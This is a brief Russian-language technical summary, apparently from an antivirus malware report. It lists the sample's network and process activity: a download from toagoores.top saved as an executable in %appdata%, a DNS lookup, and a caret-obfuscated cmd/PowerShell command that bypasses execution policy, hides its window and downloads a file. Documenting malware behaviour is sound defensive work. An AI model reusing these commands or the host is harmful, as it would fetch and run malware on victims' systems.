Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwers^h^ELl.E^xe^ -^ExecU^tI^O^NPo^l^I^cY ^b^y^pA^S^s -^NO^pr^o^fILe -WiN^do^WsTY^Le^ ^HI^d^d^EN^ (New^-O^b^J^e^Ct^ ^S^YS^te^m^.Ne^t.wEBCli^En^t)^.^D^o^wN^LoaDfI^Le^('http://t...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "pOwers^h^ELl.E^xe^ -^ExecU^tI^O^NPo^l^I^cY ^b^y^pA^S^s -^NO^pr^o^fILe -WiN^do^WsTY^Le^ ^HI^d^d^EN^ (New^-O^b^J^e^Ct^ ^S^YS^te^m^.Ne^t.wEBCli^En^t)^.^D^o^wN^LoaDfI^Le^('http://t...' (со скрытым окном)